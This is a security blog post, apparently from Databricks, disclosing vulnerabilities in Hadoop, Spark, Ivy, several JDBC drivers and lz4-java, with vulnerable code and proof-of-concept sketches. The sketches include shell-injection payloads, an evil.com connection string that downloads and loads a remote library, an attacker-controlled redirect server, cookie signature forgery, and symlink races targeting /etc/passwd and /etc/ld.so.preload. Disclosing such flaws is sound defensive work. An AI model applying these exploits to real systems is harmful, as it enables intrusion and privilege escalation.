The Databricks Product Security team is deeply committed to ensuring the security and integrity of its products, which are built on top of and integrated with a variety of open source projects. Recognizing the importance of these open source foundations, the team actively contributes to the security of these projects, thereby strengthening the overall security posture of both Databricks products and the broader open source ecosystem. This commitment takes several forms, including identifying and reporting vulnerabilities, contributing patches, and participating in security reviews and audits of open source projects. By doing so, Databricks not only safeguards its own products but also supports the resilience and security of the open source projects it relies on.
This blog provides an overview of the technical details of some of the vulnerabilities the team discovered.
CVE-2022-26612: Hadoop FileUtil unTarUsingTar shell command injection vulnerability
Apache Hadoop Common offers an API that allows users to untar an archive using the tar Unix tool. To do so, it builds a command line, potentially also involving gzip, and executes it. The issue lies in the fact that the path to the archive, which could be under user control, is not properly escaped in some situations. This could allow a malicious user to inject their own commands through the archive name, via shell metacharacters for example.
The vulnerable code can be found here.
untarCommand.append("cd '")
    .append(FileUtil.makeSecureShellPath(untarDir))
    .append("' && ")
    .append("tar -xf ");

if (gzipped) {
  untarCommand.append(" -)");
} else {
  untarCommand.append(FileUtil.makeSecureShellPath(inFile)); // <== not single-quoted!
}
String[] shellCmd = { "bash", "-c", untarCommand.toString() };
ShellCommandExecutor shexec = new ShellCommandExecutor(shellCmd);
shexec.execute();
Note that makeSecureShellPath only escapes single quotes but does not add any around the path. There was some debate about the implications of this issue for Hadoop itself, but since it is a publicly exposed API, it ultimately warranted a fix. Databricks was invested in fixing this issue because Spark's unpack code was leveraging the vulnerable code.
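To make the problem concrete, here is a minimal, hypothetical sketch (the archive name and directories below are made up for the example) of the command string that the code above would hand to bash when the archive name contains shell metacharacters:

public class UnTarInjectionDemo {
  public static void main(String[] args) {
    // Hypothetical attacker-chosen archive name (assumption for illustration only).
    String inFile = "/tmp/archive.tar; touch /tmp/pwned";
    String untarDir = "/tmp/untar";

    // Mirrors the string built above: the target directory is single-quoted,
    // but the archive path is appended verbatim.
    String untarCommand = "cd '" + untarDir + "' && tar -xf " + inFile;

    // Handed to "bash -c", the semicolon ends the tar invocation and a second
    // command ("touch /tmp/pwned") runs with the privileges of the caller.
    System.out.println(String.join(" ", "bash", "-c", untarCommand));
  }
}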
CVE-2022-33891: Apache Spark™ UI shell command injection vulnerability
Apache Spark™ uses an API to map a given user name to the set of groups it belongs to. One of the implementations is ShellBasedGroupsMappingProvider, which leveraged the id Unix command. The username passed to the function was appended to the command without being properly escaped, potentially allowing arbitrary command injection.
The vulnerable code can be found here.
// shells out a "bash -c id -Gn username" to get user groups
private def getUnixGroups(username: String): Set[String] = {
  val cmdSeq = Seq("bash", "-c", "id -Gn " + username) // <== potential command injection!
  // we need to get rid of the trailing "\n" from the result of command execution
  Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
}
We had to determine whether this provider could be reached with untrusted user input, and found the following path:
- ShellBasedGroupsMappingProvider.getGroups
- Utils.getCurrentUserGroups
- SecurityManager.isUserInACL
- SecurityManager.checkUIViewPermissions
- HttpSecurityFilter.doFilter
Ironically, the Spark UI HTTP security filter could allow that code to be reached via the doAs query parameter (see here). Fortunately, some checks in isUserInACL prevented this vulnerability from being triggerable in a default configuration.
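As a rough illustration (the payload is hypothetical and assumes a configuration in which the ACL checks are actually reached), a doAs value containing shell metacharacters would be concatenated straight into the id invocation shown above:

public class DoAsInjectionDemo {
  public static void main(String[] args) {
    // Hypothetical doAs query parameter value (assumption for illustration only).
    String doAs = "`touch /tmp/pwned`";

    // Mirrors getUnixGroups: the user name is concatenated into the "bash -c" string,
    // so the backticks would be evaluated by the shell before id ever runs.
    String[] cmdSeq = { "bash", "-c", "id -Gn " + doAs };
    System.out.println(String.join(" ", cmdSeq));
  }
}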
Apache Ivy "zip slip" vulnerability
Apache Ivy supports a packaging attribute that allows artifacts to be unpacked on the fly. The function used to perform the Zip unpacking did not check for "../" in the Zip entry names, allowing for a directory traversal type of attack, also known as "zip slip".
The vulnerable code can be found here.
while (((entry = zip.getNextEntry()) != null)) {
    File f = new File(dest, entry.getName()); // <== no check on the name of the entry!
    Message.verbose("\t\texpanding " + entry.getName() + " to " + f);

    // create intermediary directories - sometimes zip don't add them
    File dirF = f.getParentFile();
    if (dirF != null) {
        dirF.mkdirs();
    }

    if (entry.isDirectory()) {
        f.mkdirs();
    } else {
        writeFile(zip, f);
    }

    f.setLastModified(entry.getTime());
}
This could allow a user with the ability to feed Ivy a malicious module descriptor to write files outside of the local download cache.
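For illustration, here is a minimal, hypothetical sketch (the entry name and destination below are made up) of how an unchecked entry name escapes the destination directory when it is simply joined with new File(dest, name):

import java.io.File;

public class ZipSlipDemo {
  public static void main(String[] args) {
    File dest = new File("/home/user/.ivy2/cache/unpacked");

    // Hypothetical malicious entry name embedded in the archive (assumption for illustration).
    String entryName = "../../../../home/user/.bashrc";

    // Mirrors the vulnerable pattern: the entry name is joined to dest without validation,
    // so the resulting path points outside the intended extraction directory.
    File f = new File(dest, entryName);
    System.out.println(f.getPath()); // escapes the cache once the ".." segments are resolved
  }
}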
CVE-2023-32697: SQLite JDBC driver remote code execution
The SQLite JDBC driver can be made to load a remote extension due to its predictable temporary file naming when loading a remote database file, using the jdbc:sqlite::resource and enable_load_extension options that enable extension loading.
The main issue is the use of the hashCode method to generate a temporary name without taking into account that hashCode produces the same output for the same string across JVMs; an attacker can therefore predict the output and, consequently, the location of the downloaded file.
The vulnerable code can be found here.
String tempFolder = new File(System.getProperty("java.io.tmpdir")).getAbsolutePath();
String dbFileName = String.format("sqlite-jdbc-tmp-%d.db", resourceAddr.hashCode()); // <== predictable temporary file name
File dbFile = new File(tempFolder, dbFileName);
While the issue can be triggered in a single step, here is a breakdown for simplicity:
Use the following connection string: "jdbc:sqlite::resource:http://evil.com/evil.so?enable_load_extension=true"
This results in the .so file being downloaded to a predictable location in the /tmp folder, from which it can later be loaded using: "select load_extension('/tmp/sqlite-jdbc-tmp-{NUMBER}.db')"
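As a rough sketch of the predictability (assuming, for illustration, that the resource address hashes like the plain URL string; the driver's actual resourceAddr type may behave slightly differently), the {NUMBER} above can be computed offline:

public class PredictableTempNameDemo {
  public static void main(String[] args) {
    // Hypothetical remote resource used in the connection string (assumption for illustration).
    String resource = "http://evil.com/evil.so";

    // Same formula as the driver snippet above: String.hashCode is deterministic
    // across JVMs, so the attacker can compute the file name in advance.
    String dbFileName = String.format("sqlite-jdbc-tmp-%d.db", resource.hashCode());
    System.out.println(dbFileName);
  }
}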
CVE-2023-35701: Apache Hive JDBC driver arbitrary command execution
JDBC driver scrutiny has increased over the past few years, thanks to the work of people like pyn3rd, who have presented their research at security conferences worldwide, notably "Make JDBC Attacks Brilliant Again." This issue is a byproduct of that work, as it looks very similar to another issue they reported in the Snowflake JDBC driver.
The core of the issue resides in the openBrowserWindow function, which can be found here.
//Desktop is not supported, lets try to open the browser process
OsType os = getOperatingSystem();
switch (os) {
  case WINDOWS:
    Runtime.getRuntime()
        .exec("rundll32 url.dll,FileProtocolHandler " + ssoUri.toString());
    break;
  case MAC:
    Runtime.getRuntime().exec("open " + ssoUri.toString());
    break;
  case LINUX:
    Runtime.getRuntime().exec("xdg-open " + ssoUri.toString());
    break;
This function executes a command based on the redirect URI, which could potentially be supplied by an untrusted source.
To trigger the issue, one can specify a connection string such as jdbc:hive2://URL/default;auth=browser;transportMode=http;httpPath=jdbc;ssl=true, which uses the browser authentication mechanism, together with an endpoint that returns a 302 and specifies a Location header (as well as X-Hive-Client-Identifier) to provoke the faulty behavior. The fact that ssoUri is a Java URI restricts the freedom an attacker has when crafting their command line.
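For illustration, a minimal sketch of such an endpoint might look like the following (the port, path, and redirect target are made up, and this assumes the driver accepts a 302 carrying these headers, as described above):

import com.sun.net.httpserver.HttpServer;
import java.net.InetSocketAddress;

public class BrowserAuthRedirectSketch {
  public static void main(String[] args) throws Exception {
    HttpServer server = HttpServer.create(new InetSocketAddress(8080), 0);
    server.createContext("/jdbc", exchange -> {
      // The Location value ends up in ssoUri and is concatenated into Runtime.exec above.
      exchange.getResponseHeaders().add("Location", "http://attacker.example/callback");
      exchange.getResponseHeaders().add("X-Hive-Client-Identifier", "some-client-id");
      exchange.sendResponseHeaders(302, -1);
      exchange.close();
    });
    server.start();
  }
}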
CVE-2024-23945: Apache Spark™ and Hive Thrift Server cookie verification bypass
Spark's ThriftHttpServlet can be made to accept a cookie as a way to authenticate a user. This behavior is controlled by the hive.server2.thrift.http.cookie.auth.enabled configuration option (the default value depends on the project, but some of them have it set to true). The validateCookie function is used to verify the cookie, which eventually calls CookieSigner.verifyAndExtract. The issue resides in the fact that on verification failure, an exception is raised that returns both the received signature and the expected valid one, allowing a user to send the request again with said valid signature.
The vulnerable code can be found here.
if (!MessageDigest.isEqual(originalSignature.getBytes(), currentSignature.getBytes())) {
  throw new IllegalArgumentException("Invalid sign, original = " + originalSignature +
    " current = " + currentSignature); // <== leaks the expected valid signature!
}
Example output returned to the client:
java.lang.IllegalArgumentException: Invalid sign, original = AAAA current = OoWtbzoNldPiaNNNQ9UTpHI5Ii7PkPGZ+/3Fiv++GO8=
at org.apache.hive.service.CookieSigner.verifyAndExtract(CookieSigner.java:84)
at org.apache.hive.service.cli.thrift.ThriftHttpServlet.getClientNameFromCookie(ThriftHttpServlet.java:226)
at org.apache.hive.service.cli.thrift.ThriftHttpServlet.validateCookie(ThriftHttpServlet.java:282)
at org.apache.hive.service.cli.thrift.ThriftHttpServlet.doPost(ThriftHttpServlet.java:127)
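Conceptually, an attacker can therefore forge a valid cookie in two requests. Here is a hypothetical sketch of that flow (the cookie layout below is a simplified assumption, not taken from the Hive source):

public class CookieSignatureReplaySketch {
  public static void main(String[] args) {
    // Step 1 (simplified cookie layout, assumption): send a cookie with a bogus signature.
    String attempt = "cu=admin&s=AAAA";

    // Step 2: the server's error message leaks the expected signature for that payload,
    // e.g. "Invalid sign, original = AAAA current = OoWtbz...".
    String leakedSignature = "OoWtbzoNldPiaNNNQ9UTpHI5Ii7PkPGZ+/3Fiv++GO8=";

    // Step 3: replay the same payload with the leaked signature; verification now passes
    // and the request is treated as authenticated for the chosen user.
    String forged = attempt.replace("AAAA", leakedSignature);
    System.out.println(forged);
  }
}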
Both Apache Hive and Apache Spark™ were vulnerable to this and were fixed with the following PRs:
The timeline for this issue to be fixed and published illustrates some of the difficulties encountered when reporting vulnerabilities to open source projects:
- May 16, 2023: reported to [email protected]
- May 17, 2023: acknowledged
- Jun 9, 2023: asked for an update on the case
- Jun 12, 2023: reply that this is a security issue
- Oct 16, 2023: asked for an update on the case
- Oct 17, 2023: reply that a patch would be applied to Spark, but the status on the Hive side is unclear
- Nov 6, 2023: asked for an update on the case
- Dec 4, 2023: asked for an update on the case after noticing that the issue was publicly fixed in Hive and Spark
- Feb 7, 2024: asked for an update on the case
- Feb 23, 2024: release of Spark 3.5.1
- Mar 5, 2024: asked for an update on the case
- Mar 20, 2024: reply that this has been assigned CVE-2024-23945 on the Spark side
- Mar 29, 2024: release of Hive 4.0.0
- Apr 19, 2024: announced that we would publish details of the issue, since it had been more than a year with little to no updates from the relevant Apache PMCs
Redshift JDBC Arbitrary File Append
The Amazon JDBC Driver for Redshift is a Type 4 JDBC driver that provides database connectivity using the standard JDBC APIs available in the Java Platform, Enterprise Edition. The driver allows any Java application, application server, or Java-enabled applet to access Redshift.
If the JDBC driver is used across a privilege boundary, an attacker can use the Redshift JDBC Driver's logging functionality to append partially controlled log contents to any file on the filesystem. The contents can contain newlines / arbitrary characters and can be used to elevate privileges.
In the connection URL, a "LogPath" variable can be used to supply the path where log files should be saved.
This results in files such as "redshift_jdbc_connection_XX.log," where XX is a sequential number within the directory, and log entries are written to the file as expected. When creating these files, symbolic links are honored, and the log contents are written to the target of the link.
By using a controlled directory and symlinking to critical files, a user in the environment can gain a controlled write to arbitrary root-owned files and elevate privileges on the system.
The source code for the Redshift JDBC logfile handling is available in the following repo: https://github.com/aws/amazon-redshift-jdbc-driver/blame/33e046e1ccef43517fe4deb96f38cc5ac2bc73d1/src/main/java/com/amazon/redshift/logger/LogFileHandler.java#L225
To recreate this, you can create a directory in tmp, such as "/tmp/logging." Inside this directory, the user must create symbolic links with filenames matching the pattern redshift_jdbc_connection_XX.log, where the log file number increments each time the Redshift JDBC connector is used.
These symbolic links must point to the file you wish to append to. The attacker can then trigger the use of the Redshift JDBC connector, which follows the symlink and appends to the target file.
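A minimal sketch of the setup step, under the assumptions above (the directory, number of links, and target file are made up for the example):

import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

public class RedshiftLogSymlinkSketch {
  public static void main(String[] args) throws Exception {
    Path logDir = Paths.get("/tmp/logging");
    Files.createDirectories(logDir);

    // Pre-create links matching the driver's naming pattern; whichever index the
    // driver picks next will be followed, and log lines appended to the target.
    Path target = Paths.get("/etc/passwd"); // hypothetical root-owned target
    for (int i = 1; i <= 5; i++) {
      Files.createSymbolicLink(logDir.resolve("redshift_jdbc_connection_" + i + ".log"), target);
    }
    // A victim then connects with a URL containing LogPath=/tmp/logging.
  }
}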
LZ4 Java arbitrary file write privilege escalation
The lz4-java library (a Java wrapper around the lz4 library) contains a file-based race condition vulnerability that occurs when the compiled native library is dropped onto disk. Large Java applications such as Spark and Hadoop use this library heavily.
The following code demonstrates the vulnerability:
File tempLib = null;
File tempLibLock = null;
try {
  // Create the .lck file first to avoid a race condition
  // with other concurrently running Java processes using lz4-java.
  tempLibLock = File.createTempFile("liblz4-java-", "." + os().libExtension + ".lck");
  tempLib = new File(tempLibLock.getAbsolutePath().replaceFirst(".lck$", ""));

  // copy to tempLib
  try (FileOutputStream out = new FileOutputStream(tempLib)) {
    byte[] buf = new byte[4096];
    while (true) {
      int read = is.read(buf);
      if (read == -1) {
        break;
      }
      out.write(buf, 0, read);
    }
  }
  System.load(tempLib.getAbsolutePath());
As you can see, this code writes a .so stored inside the jar file out to a temporary directory before loading and executing it. The createTempFile function is used to generate a unique path to avoid collisions. Before writing the file to disk, the developer creates a variant of the file name with a .lck extension, presumably to prevent collisions with other processes using the library. However, this .lck file allows an attacker watching the directory to race the creation of the real file: after learning the filename from the .lck creation, they can create a symbolic link at that path pointing anywhere on the filesystem.
The ramifications of this are twofold: first, the attacker can overwrite any file on the system with the contents of this .so file, which may allow an unprivileged attacker to overwrite root-owned files. Second, the symlink can be replaced between writing and loading, allowing the attacker to have a custom shared object they supply loaded as root. If this library is used across a privilege boundary, this may grant an attacker code execution at an elevated privilege level.
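A minimal sketch of the attacker's side of the race, under the assumptions above (the directory watching and timing are simplified, winning the race is probabilistic, and the symlink target is made up):

import java.io.File;
import java.nio.file.Files;
import java.nio.file.Paths;

public class Lz4RaceSketch {
  public static void main(String[] args) throws Exception {
    File tmp = new File(System.getProperty("java.io.tmpdir"));
    while (true) {
      File[] files = tmp.listFiles();
      if (files == null) continue;
      for (File f : files) {
        String name = f.getName();
        if (name.startsWith("liblz4-java-") && name.endsWith(".lck")) {
          // The native library will be written at the same path minus ".lck"; try to
          // plant a symlink there first so the copy lands on an attacker-chosen target.
          File lib = new File(tmp, name.substring(0, name.length() - ".lck".length()));
          if (!lib.exists()) {
            Files.createSymbolicLink(lib.toPath(), Paths.get("/etc/ld.so.preload")); // hypothetical target
          }
        }
      }
    }
  }
}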
Conclusion
At Databricks, we recognize that improving the security of the open source software we rely on is a collective effort. We are committed to proactively improving the security of our contributions and dependencies, fostering collaboration within the community, and implementing best practices to safeguard our systems. By prioritizing security and encouraging transparency, we aim to create a more resilient open source environment for everyone. Learn more about Databricks Security at our Security and Trust Center.